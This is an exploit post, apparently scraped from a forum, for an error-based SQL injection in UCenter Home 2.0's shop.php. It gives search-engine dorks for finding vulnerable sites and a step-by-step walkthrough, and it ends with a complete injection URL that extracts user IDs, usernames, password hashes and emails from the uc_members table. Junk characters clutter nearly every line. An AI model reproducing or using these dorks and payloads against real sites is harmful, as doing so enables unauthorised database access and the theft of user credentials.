% p, T0 g2 i/ c0 J7 s# b__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
$ `5 a' \6 V) _; s) ?, I3 ?! \% F+ r
K" a- k8 V; H 5 k, K) \. d1 E' f) [9 r
/ B: H7 O# B% U*/ Author : KnocKout
7 X6 U) ?9 w( \' V
' p, z# F8 S( q g$ p*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers ) H5 p; C5 l4 M" N. ~4 m
3 }- I& S, ?( b P* y, @2 Q6 E*/ Contact: knockoutr@msn.com 0 A' c3 ~* D1 i" e5 T
# B4 @/ K5 Y, N( |; X1 E*/ Cyber-Warrior.org/CWKnocKout
* p8 n D8 W4 k$ }" g# l/ e5 N2 w8 n5 o5 k' R- [! W
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
! U' t( a+ q7 J4 x
y7 f: C) M. l! e# f2 ?Script : UCenter Home
1 v o% L" H+ z3 k1 @3 {8 k8 X2 ~/ R' N' ^- P0 s3 P
Version : 2.0
; K% G3 N1 q7 b# ~) D( T; b& h
1 ?6 f) v) f& Q. ~& U: lScript HomePage : http://u.discuz.net/ ( R$ Q. q' x: F, q$ _% a4 R
' |0 {% H* s9 y9 l
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
& y" o$ o4 ?+ n0 d' k# ~9 l3 p8 l) M) Q+ `
Dork : Powered by UCenter inurl:shop.php?ac=view $ h& x; P' H( B. d
; ]6 Y( {" d6 u' B1 _Dork 2 : inurl:shop.php?ac=view&shopid=
6 a T. D; Z- Q; g0 ~2 w J
0 ~# w7 u4 W/ R- a. A3 M__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
( A: d6 M7 N3 r" a- F; Y( Z3 u% h% K9 \: ?& p* e5 M @" _8 I$ @& L
Vuln file : Shop.php
+ L, g$ }! C! I# l) V
9 ~) k+ E. X* I2 a5 [! }value's : (?)ac=view&shopid=
d5 y" R& T) c9 G# V* @- l5 u/ x Y, z! a. \
Vulnerable Style : SQL Injection (MySQL Error Based)
% u- T$ q9 t5 S
9 z+ J. u" N/ ?& }* E! VNeed Metarials : Hex Conversion ! ^- ?% k% J) {5 L% s
. f, ~* o0 H- R3 T__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
4 Q. V0 V( \& C
3 S0 {( ?, C4 K) x5 u% {: LYour Need victim Database name. ' c( u) P) I5 J# A& P( o
# V2 r' X& k. K
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
6 q( [" ]/ P# Z+ a% s
0 y( G ^8 l8 A+ O2 H.. 7 Y" _' n3 O6 H& b) E) y& Q
) |8 T% N; V1 K7 t. ^
DB : Okey.
/ Y8 J" {* C, Q+ |/ ]
/ l$ W; Z& N/ h% i+ S1 Oyour edit DB `[TARGET DB NAME]` ! E1 G) a! J' q* @0 h
- c. a8 ^9 d: M2 O/ mExample : 'hiwir1_ucenter' # \& o0 @4 H2 Y: J( v+ L6 V
+ }1 m K3 p4 S5 E2 C/ h
Edit : Okey.
3 l& x! m4 c/ z" ]! u5 a% R
& ~/ C$ w4 E, @, F# AYour use Hex conversion. And edit Your SQL Injection Exploit..
- E; b; ~4 [2 F2 Y" W! T8 O- x7 x. n+ v! T
, w+ Z3 _4 i6 t6 @$ t+ W- o2 w) n. |+ i
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
6 f: \* ^; V" D! {! m- S6 b |
发表于 2013-2-27 21:31:31
收藏
支持
反对